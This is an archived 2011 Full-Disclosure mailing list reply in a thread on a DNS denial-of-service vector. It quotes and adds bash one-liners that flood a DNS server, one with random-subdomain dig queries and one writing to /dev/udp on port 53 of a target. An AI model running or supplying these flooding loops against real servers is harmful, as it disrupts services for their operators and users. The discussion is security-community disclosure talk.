| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BANLkTiki-3fcMt44fRW1br=qBZhAVdxOkg@mail.gmail.com> Date: Fri, 20 May 2011 16:08:05 +0200 From: Balder <balder.theglorious@...glemail.com> To: Kristian Erik Hermansen <kristian.hermansen@...il.com> Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk> Subject: Re: New DDoS attack vector On 20 May 2011 13:35, Kristian Erik Hermansen <kristian.hermansen@...il.com> wrote: > On Fri, May 20, 2011 at 4:29 AM, Balder > <balder.theglorious@...glemail.com> wrote: >> * Why go to all this trouble when you could just do something like >> the following (replacing dig with something faster) >> - while true ; do dig $(</dev/urandom tr -dc A-Za-z0-9 | head -c >> 10 ).example.com MX ; done > > dnsperf is what you really want ;) even the following if if there is no IDS and if there is you would probably have just as much chance of overloading its state table then the dns server while true ; do echo /dev/urandom > /dev/udp/target_IP_address/53 ; done thanks to /dev/random http://blog.rootshell.be/2011/05/05/binbash-phone-home/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists